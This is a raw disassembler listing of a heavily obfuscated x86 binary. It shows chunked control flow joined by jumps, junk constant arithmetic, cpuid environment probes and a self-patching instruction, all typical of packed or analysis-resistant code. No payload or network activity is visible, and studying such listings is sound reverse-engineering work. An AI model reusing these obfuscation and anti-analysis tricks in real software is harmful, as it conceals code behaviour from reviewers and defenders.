sub_42326C proc near ; CODE XREF: _0182ofla:0042303A�j
; sub_426571-F69�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424685 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004247A7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426075 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426BB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A3DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ADB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B6EB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042CAA0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D28B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E063 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042E41E SIZE 0000001E BYTES
jno sub_428A08
push ebp
mov ebp, esp
jmp loc_424685
sub_42326C endp
; ---------------------------------------------------------------------------
mov ebp, 830A16B9h
or edx, ebp
jmp sub_42CAC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_423286: ; CODE XREF: sub_42798F+3838�j
mov [ebx], edi
jmp loc_42C36B
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42328D: ; CODE XREF: sub_424184+578D�j
jnz loc_42D2A4
loc_423293: ; CODE XREF: sub_424184:loc_42418F�j
mov eax, 400h
call sub_42D70E
push edx
push 64E461F0h
pop edx
jmp loc_42B8E4
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
pop edx
jmp sub_42771F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_4232AF: ; CODE XREF: sub_428F0F:loc_42711E�j
push eax
push offset sub_4290FD
jmp nullsub_123
; END OF FUNCTION CHUNK FOR sub_428F0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_4232BA: ; CODE XREF: sub_425B6E+4591�j
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
xchg ecx, [esp-18h+arg_10]
mov ebp, ecx
pop ecx
jmp loc_42E8CD
; END OF FUNCTION CHUNK FOR sub_425B6E
; =============== S U B R O U T I N E =======================================
sub_4232CD proc near ; CODE XREF: sub_428EF6+E�p
; _0182ofla:0042B2A4�j
; FUNCTION CHUNK AT 00427234 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-4]
push offset sub_423CEA
jmp loc_427234
sub_4232CD endp
; ---------------------------------------------------------------------------
pushf
mov [esp], eax
ror eax, 19h
mov ds:dword_42E8D4, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_4232EC: ; CODE XREF: sub_426020+737E�j
rol eax, 19h
push eax
jmp loc_4278D6
; END OF FUNCTION CHUNK FOR sub_426020
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_4232F5: ; CODE XREF: sub_425B6E:loc_427A97�j
xchg esi, [eax]
jmp loc_42331C
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
loc_4232FC: ; DATA XREF: sub_429071-114D�o
add eax, 0E302046Eh
xchg eax, [esp]
jmp locret_42C196
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push offset sub_423114
jmp locret_424761
; ---------------------------------------------------------------------------
cmp edi, esi
jmp loc_4242F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42331C: ; CODE XREF: sub_425B6E-2877�j
sub edx, 905946BFh
loc_423322: ; CODE XREF: sub_42798F:loc_42B264�j
push 0C6B14A97h
pop eax
or eax, 8CC4314Ch
jmp loc_42755A
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
loc_423333: ; CODE XREF: _0182ofla:loc_429D06�j
jnz loc_428908
jmp loc_424A8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E668
loc_42333E: ; CODE XREF: sub_42E668:loc_42B28E�j
; _0182ofla:0042B817�j
add eax, eax
cdq
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
call sub_42D8FF
xchg ebx, [esi]
jmp sub_42AB9B
; END OF FUNCTION CHUNK FOR sub_42E668
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_42335B: ; CODE XREF: sub_429BEC:loc_425264�j
call sub_4294FE
; END OF FUNCTION CHUNK FOR sub_429BEC
; =============== S U B R O U T I N E =======================================
sub_423360 proc near ; CODE XREF: _0182ofla:004250C4�j
; _0182ofla:00425399�p
mov [esp+0], ecx
sub_423360 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42380D
loc_423363: ; CODE XREF: sub_42380D+980B�j
pop ecx
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
jmp loc_42B09D
; END OF FUNCTION CHUNK FOR sub_42380D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_423372: ; CODE XREF: sub_427942+5BAD�j
jmp loc_42CD2C
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_423377: ; CODE XREF: sub_428D63+2B24�j
jmp loc_428BB4
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42337C: ; CODE XREF: sub_428F20:loc_42B8DA�j
pop eax
add eax, 25B947B9h
cpuid
cmp eax, 80000000h
jbe loc_42D629
jmp loc_42B2AF
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_423395 proc near ; CODE XREF: _0182ofla:00428C98�j
; sub_429C1A+44F7�p
; FUNCTION CHUNK AT 0042432B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425076 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427AF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D65 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427DF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A9F2 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042AFFF SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042B103 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B4E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C44D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D239 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D409 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D46C SIZE 00000005 BYTES
mov [esp+0], edi
loc_423398: ; CODE XREF: sub_42DE3A:loc_42E0D6�j
pop edi
call sub_42C197
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_42A9F2
jmp loc_42D46C
sub_423395 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_4233B0: ; CODE XREF: sub_42B3C2:loc_42DF3C�j
shr esi, 1
jp loc_42C48E
adc ebp, edi
jmp loc_42ADD2
; END OF FUNCTION CHUNK FOR sub_42B3C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_4233BF: ; CODE XREF: sub_42B15E:loc_428FBC�j
pop ebx
pop edx
pop ebp
jmp loc_4283D7
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
jmp loc_425EB9
; ---------------------------------------------------------------------------
loc_4233CF: ; DATA XREF: _0182ofla:00427FF7�o
rol edx, 5
mov [ebp-4], edx
cmp dword ptr [ebp-8], 0
jbe loc_428923
jmp loc_424D5F
; ---------------------------------------------------------------------------
loc_4233E4: ; DATA XREF: sub_425A3C:loc_4242BA�o
xchg ecx, [esp]
jmp loc_42A2E0
; =============== S U B R O U T I N E =======================================
sub_4233EC proc near ; CODE XREF: sub_42A915+C�p
; _0182ofla:0042E22A�j
; FUNCTION CHUNK AT 0042B22D SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
mov ecx, [ecx]
push ebx
jmp loc_42B22D
sub_4233EC endp
; =============== S U B R O U T I N E =======================================
sub_4233F8 proc near ; DATA XREF: _0182ofla:004294D5�o
var_4 = dword ptr -4
push esi
push 0F540BB44h
pop esi
add esi, 0B0231C7h
xchg esi, [esp+4+var_4]
jmp loc_4286D4
sub_4233F8 endp
; =============== S U B R O U T I N E =======================================
sub_42340D proc near ; CODE XREF: _0182ofla:004269AD�j
; sub_42DD2A-566D�p
; FUNCTION CHUNK AT 004250A0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00427264 SIZE 00000006 BYTES
xchg ebx, [esp+0]
pop ebx
and ecx, 7
mov eax, 1
shl eax, cl
mov edx, [ebp-20h]
jmp loc_4250A0
sub_42340D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_423423: ; CODE XREF: sub_423A2A:loc_42850B�j
mov edx, 3CC6743Ch
call sub_42D71D
push eax
ror eax, 0Bh
jmp loc_42B7BB
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_423436: ; CODE XREF: _0182ofla:004268CE�j
; _0182ofla:loc_429F1C�j
push esi
push offset sub_42C9E6
jmp loc_428515
; ---------------------------------------------------------------------------
xchg edi, edx
jmp sub_426240
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_423448: ; CODE XREF: sub_425BF8:loc_42CA88�j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_42AE31
mov edx, [ebx+ecx]
push offset sub_428FED
jmp loc_4266F2
; END OF FUNCTION CHUNK FOR sub_425BF8
; =============== S U B R O U T I N E =======================================
sub_423461 proc near ; DATA XREF: sub_42380D+19B�o
; FUNCTION CHUNK AT 0042743A SIZE 0000000B BYTES
add edx, 565F8EAh
test eax, edx
pop edx
jz loc_42743A
mov eax, 63h
call sub_4265C0
jmp loc_427682
sub_423461 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_42384B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test esi, 17B6283Dh
jmp loc_42389B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_423490: ; CODE XREF: sub_42AB3E:loc_42B073�j
jz loc_42C25A
jmp loc_42A3C2
; END OF FUNCTION CHUNK FOR sub_42AB3E
; =============== S U B R O U T I N E =======================================
sub_42349B proc near ; CODE XREF: sub_42EAB7:loc_426B77�p
; _0182ofla:00429255�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423A9A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424D52 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425535 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042668B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426EC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004284DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004296A6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042A3AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CD09 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042D0C8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D9FE SIZE 0000000F BYTES
mov [esp+0], edx
pop edx
cmp dword ptr [ebp-1Ch], 66h
jnz loc_42D9FE
mov eax, 6
jmp loc_42D0C8
sub_42349B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294FE
loc_4234B3: ; CODE XREF: sub_4294FE+A�j
sub ebx, 0E8A6DE43h
rol ebx, 0Bh
add ebx, 0DC847CAAh
add ebx, ecx
add ebx, 65CFBECCh
jmp loc_42ABE4
; END OF FUNCTION CHUNK FOR sub_4294FE
; ---------------------------------------------------------------------------
loc_4234CF: ; CODE XREF: _0182ofla:loc_42936B�j
push ecx
push 0BC6BE5CCh
pop ecx
or ecx, 0B540CA09h
rol ecx, 11h
add ecx, 20A72F1Bh
jmp loc_424C12
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_4234EB: ; CODE XREF: sub_42D833+E10�j
jmp loc_425E2D
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
loc_4234F0: ; CODE XREF: _0182ofla:00426E2D�j
jnp loc_425CA5
jl loc_427CF5
loc_4234FC: ; CODE XREF: _0182ofla:loc_42B3D8�j
push offset loc_4258D7
jmp loc_4272B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D553
loc_423506: ; CODE XREF: sub_42D553+A�j
call sub_423704
loc_42350B: ; CODE XREF: sub_427259+7A8B�j
jmp loc_4246E8
; END OF FUNCTION CHUNK FOR sub_42D553
; ---------------------------------------------------------------------------
loc_423510: ; CODE XREF: _0182ofla:0042AD76�j
jmp loc_4296C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_423515: ; CODE XREF: sub_423A2A+4107�j
jmp loc_42B67E
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_42351A: ; CODE XREF: sub_425629+9726�j
js loc_424E69
loc_423520: ; CODE XREF: sub_425629:loc_42C59D�j
and edx, 8A64B57Bh
jns loc_423EDE
test edx, esi
jmp loc_423ECA
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_423533: ; CODE XREF: sub_42B15E-207E�j
jge loc_42DCD8
adc edx, 0B21E5936h
loc_42353F: ; CODE XREF: sub_42B15E:loc_42749B�j
call sub_42E2B3
loc_423544: ; CODE XREF: _0182ofla:0042C636�j
jmp loc_423D6A
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_423549: ; CODE XREF: _0182ofla:loc_42AD98�j
jz loc_42ED80
jmp loc_42A209
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_423554: ; CODE XREF: sub_42E43C:loc_426C5A�j
; sub_4253F4+92FA�j
jl loc_429A30
jnz loc_4236A5
jmp loc_4259A3
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1F0
loc_423565: ; CODE XREF: sub_42E1F0+8�j
ror eax, 7
mov ds:dword_424C04, eax
retn
; END OF FUNCTION CHUNK FOR sub_42E1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42356F: ; CODE XREF: sub_428F20+22CE�j
jmp loc_42C147
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
loc_423574: ; CODE XREF: _0182ofla:0042ACE8�j
jmp loc_42C42D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AE0
loc_423579: ; CODE XREF: sub_429AE0+E�j
jmp loc_42A7EE
; END OF FUNCTION CHUNK FOR sub_429AE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4283EF
loc_42357E: ; CODE XREF: sub_4283EF+F�j
jmp nullsub_225
; END OF FUNCTION CHUNK FOR sub_4283EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CDE
loc_423583: ; CODE XREF: sub_427CDE+11�j
rol eax, 7
push eax
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_427CDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_42358D: ; CODE XREF: sub_423FE2+58F6�j
jmp loc_42E09E
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
loc_423592: ; DATA XREF: sub_427797:loc_427281�o
xchg ebx, [esp]
jmp sub_428D17
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C197
loc_42359B: ; CODE XREF: sub_42C197+7�j
jmp loc_42D1D0
; END OF FUNCTION CHUNK FOR sub_42C197
; =============== S U B R O U T I N E =======================================
sub_4235A0 proc near ; CODE XREF: _0182ofla:00425250�p
; _0182ofla:00426C09�p
mov eax, offset dword_425780
push edx
sub_4235A0 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4235A6: ; CODE XREF: sub_423A2A+49E0�j
push 0A274EE68h
pop edx
rol edx, 3
jmp loc_42E07F
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_4235B4: ; DATA XREF: sub_428F20-29DC�o
xchg ecx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_4235B8: ; CODE XREF: sub_4249FA+B1B�j
jmp loc_429C74
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
push offset loc_423E9C
jmp locret_428C62
; =============== S U B R O U T I N E =======================================
sub_4235C7 proc near ; CODE XREF: _0182ofla:0042A9A7�j
; sub_42CA29+6�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424624 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428B83 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B391 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042EA93 SIZE 0000001A BYTES
mov [esp+0], edi
pop edi
push ecx
mov ecx, ebp
xchg ecx, [esp+0]
mov ebp, esp
jmp loc_42EA93
sub_4235C7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_4235D8: ; CODE XREF: sub_42AB3E:loc_42A3C2�j
adc edx, ebp
jge loc_42CA90
shl eax, 12h
xchg ebx, ecx
jmp loc_42C25A
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
loc_4235EA: ; CODE XREF: _0182ofla:00425867�j
jz loc_4248F3
; START OF FUNCTION CHUNK FOR sub_426A7F
loc_4235F0: ; CODE XREF: sub_426A7F:loc_426A87�j
xor eax, 341684DBh
add eax, 76D7F2B2h
xchg eax, [esp+0]
jmp loc_426753
; END OF FUNCTION CHUNK FOR sub_426A7F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C55
loc_423604: ; CODE XREF: sub_425C55-1F70�j
pop ebx
jmp loc_428577
; END OF FUNCTION CHUNK FOR sub_425C55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42360A: ; CODE XREF: sub_428729+422D�j
jp loc_42A390
adc esi, 2A717FDFh
jmp loc_42AE8A
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFE6369h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ebp, esp
jnb loc_42D4F4
add esp, 0FFFFFFCCh
lea eax, nullsub_2
mov byte ptr [eax], 0C3h
jmp loc_426D4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_42363A: ; CODE XREF: sub_42966F:loc_42E419�j
xchg eax, ebx
jmp loc_42CF54
; END OF FUNCTION CHUNK FOR sub_42966F
; ---------------------------------------------------------------------------
ja loc_427062
push 0C6586833h
; =============== S U B R O U T I N E =======================================
sub_42364C proc near ; CODE XREF: sub_42660C+8D5�p
arg_0 = dword ptr 4
mov [esp+0], eax
pop eax
xchg esi, [esp-4+arg_0]
jmp sub_428D17
sub_42364C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E585
loc_423658: ; CODE XREF: sub_42E585:loc_42E592�j
xchg ecx, edi
shl esi, 5
adc ecx, ebp
push edi
jmp loc_427EA9
; END OF FUNCTION CHUNK FOR sub_42E585
; ---------------------------------------------------------------------------
loc_423665: ; CODE XREF: _0182ofla:loc_426446�j
mov dword ptr [ecx], offset loc_4266A1
xor eax, eax
pop ecx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_42366F: ; CODE XREF: sub_426319:loc_4265BB�j
pop eax
pop ecx
pop ebx
pop edx
jmp loc_42EBBC
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D02D
loc_423678: ; CODE XREF: sub_42D02D:loc_426F22�j
sbb edi, 95A4AAB8h
jmp loc_4278F0
; END OF FUNCTION CHUNK FOR sub_42D02D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_423683: ; CODE XREF: sub_4267F8+5�j
mov eax, [esp+0]
push edx
call sub_428041
loc_42368C: ; CODE XREF: sub_4267F8+5C18�j
jmp loc_4293FD
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_423691: ; CODE XREF: sub_42E218-397B�j
jmp loc_42DBE9
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_423696: ; CODE XREF: sub_4253F4+8D42�j
and edx, 0FFFFDDFFh
xor [esi], edx
mov eax, 80000000h
cpuid
loc_4236A5: ; CODE XREF: sub_4253F4-1E9A�j
cmp eax, 80000000h
jbe loc_42D629
jmp loc_427CCB
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_4236B5: ; CODE XREF: _0182ofla:0042477F�j
jge loc_42A884
; START OF FUNCTION CHUNK FOR sub_42D056
loc_4236BB: ; CODE XREF: sub_42D056+1C75�j
jmp loc_423A52
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290FD
loc_4236C0: ; CODE XREF: sub_4290FD+F�j
jmp loc_42E0EC
; END OF FUNCTION CHUNK FOR sub_4290FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B70
loc_4236C5: ; CODE XREF: sub_424B70+11�j
jmp loc_42835F
; END OF FUNCTION CHUNK FOR sub_424B70
; ---------------------------------------------------------------------------
popf
jmp loc_42A87C
; ---------------------------------------------------------------------------
loc_4236D0: ; CODE XREF: _0182ofla:004272DD�j
call sub_4283BB
; START OF FUNCTION CHUNK FOR sub_42C870
loc_4236D5: ; CODE XREF: sub_42C870+C�j
jmp nullsub_102
; END OF FUNCTION CHUNK FOR sub_42C870
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429038
loc_4236DA: ; CODE XREF: sub_429038:loc_42B722�j
call sub_4265C0
jmp loc_42DB50
; END OF FUNCTION CHUNK FOR sub_429038
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
jmp loc_425FA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4236F0: ; CODE XREF: sub_42798F-2337�j
; _0182ofla:004258CC�j ...
mov eax, [ebp-10h]
loc_4236F3: ; CODE XREF: sub_42A760:loc_42A8BD�j
push eax
call sub_4271D2
jmp loc_42A7D0
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_4236FE: ; CODE XREF: _0182ofla:0042534F�j
ja loc_4249F3
; =============== S U B R O U T I N E =======================================
sub_423704 proc near ; CODE XREF: sub_42D553:loc_423506�p
; FUNCTION CHUNK AT 00427F2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EDAF SIZE 00000015 BYTES
mov [esp+0], ecx
pop ecx
mov edx, [ebp+8]
mov [edx-18h], eax
inc dword ptr [ebp-4]
jmp loc_427F2D
sub_423704 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423716 proc near ; DATA XREF: sub_42E689-1D1C�o
call sub_424CD8
retn
sub_423716 endp
; =============== S U B R O U T I N E =======================================
sub_42371C proc near ; CODE XREF: sub_425499:loc_4259D4�p
; sub_425499+545�p ...
push offset sub_42D833
jmp nullsub_12
sub_42371C endp
; =============== S U B R O U T I N E =======================================
sub_423726 proc near ; CODE XREF: sub_42719D+BE0�p
; _0182ofla:0042C34C�j
; FUNCTION CHUNK AT 00427078 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042AF83 SIZE 00000010 BYTES
xchg esi, [esp+0]
pop esi
lea eax, loc_42707C
push edi
push 507B7591h
pop edi
or edi, 0E45DEBFFh
add edi, 2FB0E539h
jmp loc_42AF83
sub_423726 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_423748: ; CODE XREF: sub_42C1B2-7A56�j
jnz loc_42D27C
jmp loc_425681
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
loc_423753: ; CODE XREF: _0182ofla:0042842F�j
ja loc_42D8FD
add edi, 17B350ECh
cdq
sub esi, 833E3D87h
jmp loc_429EC1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42376B: ; CODE XREF: sub_428A39:loc_425269�j
; sub_428A39-37B4�j
or eax, 4255DA2Eh
add eax, 0BDA02095h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
jmp loc_42E11B
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_423786: ; CODE XREF: sub_4265C0:loc_42B223�j
mov esi, ecx
xchg esi, [esp+8+var_8]
mov [ebp-4], eax
push edx
push 0DBC1F2BFh
jmp loc_428F41
; END OF FUNCTION CHUNK FOR sub_4265C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_423799: ; CODE XREF: sub_4295D6:loc_42DEBA�j
push ecx
mov esp, ebp
xchg ebx, [esp+4+var_4]
mov ebp, ebx
pop ebx
push 0FC7B8706h
jmp loc_424FBD
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4237AC: ; CODE XREF: sub_423FCD+879E�j
jl loc_42E61A
rol ebx, 18h
jmp loc_42C2AE
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_4237BA: ; CODE XREF: sub_42B15E+1D�j
pop eax
sub eax, 3A5402E3h
and eax, ds:4000F3h
call sub_42A364
loc_4237CC: ; CODE XREF: sub_427CDE+6F9E�j
jl loc_429770
adc ecx, esi
ror edi, 0Ch
cmp eax, 0FFA2CAC5h
jmp loc_42D16E
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_4237E2: ; CODE XREF: _0182ofla:0042B1D1�j
sbb ecx, 445C0846h
and ebx, esi
loc_4237EA: ; CODE XREF: _0182ofla:loc_42C186�j
mov eax, 0E1h
call sub_4265C0
jmp loc_4277AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_4237F9: ; CODE XREF: sub_4291BA-1B98�j
mov edx, 43A8AC5Ch
; END OF FUNCTION CHUNK FOR sub_4291BA
; START OF FUNCTION CHUNK FOR sub_429E52
loc_4237FE: ; CODE XREF: sub_429E52:loc_429F79�j
call sub_42D71D
call sub_42AA33
jmp loc_42613E
; END OF FUNCTION CHUNK FOR sub_429E52
; =============== S U B R O U T I N E =======================================
sub_42380D proc near ; CODE XREF: _0182ofla:004289C5�j
; sub_429DCF+A�p
; FUNCTION CHUNK AT 00423363 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004239A1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00425E21 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426450 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427AFE SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00427F69 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042886B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428A55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428CA7 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 004291B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A7FD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B09D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042C274 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CEC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D012 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042D150 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042D204 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
mov eax, [eax]
test eax, 70h
jz loc_428CAC
